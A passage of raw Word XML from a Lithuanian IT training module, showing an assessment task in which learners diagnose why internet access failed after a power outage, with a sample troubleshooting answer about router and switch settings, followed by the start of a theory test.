        <w:lastRenderedPageBreak/>
        <w:t>pavadinime turėtų būti nurodytas įvykio ID numeris.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD23525" w14:textId="16EEC825" w:rsidR="000C55CD" w:rsidRPr="005A5C28" w:rsidRDefault="000C55CD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344B8314" w14:textId="77777777" w:rsidR="00593BD0" w:rsidRPr="005A5C28" w:rsidRDefault="00593BD0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>9 užduotis. NUSTATYTI INFORMACINĖS SISTEMOS PROGRAMINĮ GEDIMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7BE54A" w14:textId="61B2500E" w:rsidR="69BC6442" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="6849496F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="5FE6DE8B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="5FE6DE8B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti konkretų atsakymą</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5FE6DE8B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kas įvyko ir</w:t>
      </w:r>
      <w:r w:rsidR="38C63AA4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="36DC4E71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dėl ko dingo internet</w:t>
      </w:r>
      <w:r w:rsidR="72E8D169" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>o ryšys</w:t>
      </w:r>
      <w:r w:rsidR="36DC4E71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="5FE6DE8B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ap</w:t>
      </w:r>
      <w:r w:rsidR="0F53A1E7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rašyti</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B07B17" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>susidariusios</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> problemos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>šalinimo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>būdus</w:t>
      </w:r>
      <w:r w:rsidR="0F53A1E7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8619E9" w14:textId="6DDCBD05" w:rsidR="43DA4AF0" w:rsidRPr="005A5C28" w:rsidRDefault="43DA4AF0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14751611" w14:textId="5AE1E470" w:rsidR="60FF909A" w:rsidRPr="005A5C28" w:rsidRDefault="31C3F47B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kadangi elektr</w:t>
      </w:r>
      <w:r w:rsidR="00227BFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>os ryšio tiekimas nutrūko</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vienai valandai visame pastate</w:t>
      </w:r>
      <w:r w:rsidR="034B97EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="2BF667FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ašalinus elektros tinklo gedimą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, interneto </w:t>
      </w:r>
      <w:r w:rsidR="27E423C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ryšys</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> neatsistatė</w:t>
      </w:r>
      <w:r w:rsidR="2D88BC15" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="4C887926" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6695C58A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="4C887926" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>eik</w:t>
      </w:r>
      <w:r w:rsidR="1A499F87" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ėtų patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="045D702D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> interneto </w:t>
      </w:r>
      <w:r w:rsidR="1EB3A56C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ryšio </w:t>
      </w:r>
      <w:r w:rsidR="045D702D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tiekėjo</w:t>
      </w:r>
      <w:r w:rsidR="4C887926" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pagr</w:t>
      </w:r>
      <w:r w:rsidR="1EC40E96" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">indinio maršrutizatoriaus </w:t>
      </w:r>
      <w:r w:rsidR="63FD8F64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nustatymus</w:t>
      </w:r>
      <w:r w:rsidR="01B5BF76" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. J</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ei maršrutizatorius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nėra </w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sug</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>edęs,</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> veikia</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ntis</w:t>
      </w:r>
      <w:r w:rsidR="6B0B2545" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, tai bandome atstatyti</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> jo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6B0B2545" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nustatymus.</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jei</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> maršrutizatorius</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sugedo</w:t>
      </w:r>
      <w:r w:rsidR="64188033" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikia kviest</w:t>
      </w:r>
      <w:r w:rsidR="15717859" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> interneto</w:t>
      </w:r>
      <w:r w:rsidR="195CF9C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ryšio</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiekėjo specialistą, kad</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> jis</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pakeistų</w:t>
      </w:r>
      <w:r w:rsidR="0701C023" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> maršrutizatorių</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nauju</w:t>
      </w:r>
      <w:r w:rsidR="28B279A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="65E4B425" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3018BFB5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="21DB2823" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ei</w:t>
      </w:r>
      <w:r w:rsidR="0DED1014" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ank</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>čiau buvo daryta</w:t>
      </w:r>
      <w:r w:rsidR="072E6C92" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> maršrutizatoriaus</w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7A0E2FFD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nustatymų </w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kopija</w:t>
      </w:r>
      <w:r w:rsidR="1CB7728C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="1BB9948F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuomet</w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="05189FAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>maršrutizatoriaus nustatymus</w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reik</w:t>
      </w:r>
      <w:r w:rsidR="67F9719C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ėtų</w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pabandyti atstatyti iš</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> turimos</w:t>
      </w:r>
      <w:r w:rsidR="18C7E7E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kopijos</w:t>
      </w:r>
      <w:r w:rsidR="7DA59086" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0FE0A8F7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jei tai nepadėjo</w:t>
      </w:r>
      <w:r w:rsidR="012DB2DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir interneto ryšio vis</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">dar </w:t>
      </w:r>
      <w:r w:rsidR="012DB2DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nėra, tuomet</w:t>
      </w:r>
      <w:r w:rsidR="0FE0A8F7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikia </w:t>
      </w:r>
      <w:r w:rsidR="1C0B1735" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="0FE0A8F7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutatoriaus nustatymus ir</w:t>
      </w:r>
      <w:r w:rsidR="620AF31A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, jei reikia, </w:t>
      </w:r>
      <w:r w:rsidR="0FE0A8F7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bandyti atstatyti</w:t>
      </w:r>
      <w:r w:rsidR="41125A15" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutatoriaus nustatymus</w:t>
      </w:r>
      <w:r w:rsidR="0FE0A8F7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="6CC263B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jei </w:t>
      </w:r>
      <w:r w:rsidR="7AA57E48" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">komutatorius </w:t>
      </w:r>
      <w:r w:rsidR="6CC263B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sugedo aparati</w:t>
      </w:r>
      <w:r w:rsidR="5A1C995E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>niame lygmenyje</w:t>
      </w:r>
      <w:r w:rsidR="6CC263B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, tai</w:t>
      </w:r>
      <w:r w:rsidR="709E4D5D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutatorių reikėtų pakeisti </w:t>
      </w:r>
      <w:r w:rsidR="6CC263B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nauju.</w:t>
      </w:r>
      <w:r w:rsidR="36B173E1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atlikus ši</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="36B173E1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">os veiksmus reikėtų </w:t>
      </w:r>
      <w:r w:rsidR="7499006C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7499006C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ar veikia</w:t>
      </w:r>
      <w:r w:rsidR="36B173E1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> interneto ryšys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F06CB" w14:textId="6DDCBD05" w:rsidR="23C33711" w:rsidRPr="005A5C28" w:rsidRDefault="23C33711" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5719F8E7" w14:textId="6FFB9D99" w:rsidR="00593BD0" w:rsidRPr="005A5C28" w:rsidRDefault="00593BD0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TESTAS, SKIRTAS ĮSIVERTINTI MODULIO TEORINIŲ ŽINIŲ GEBĖJIMUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787C5E21" w14:textId="73559F81" w:rsidR="615E0537" w:rsidRPr="005A5C28" w:rsidRDefault="005A1EB5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
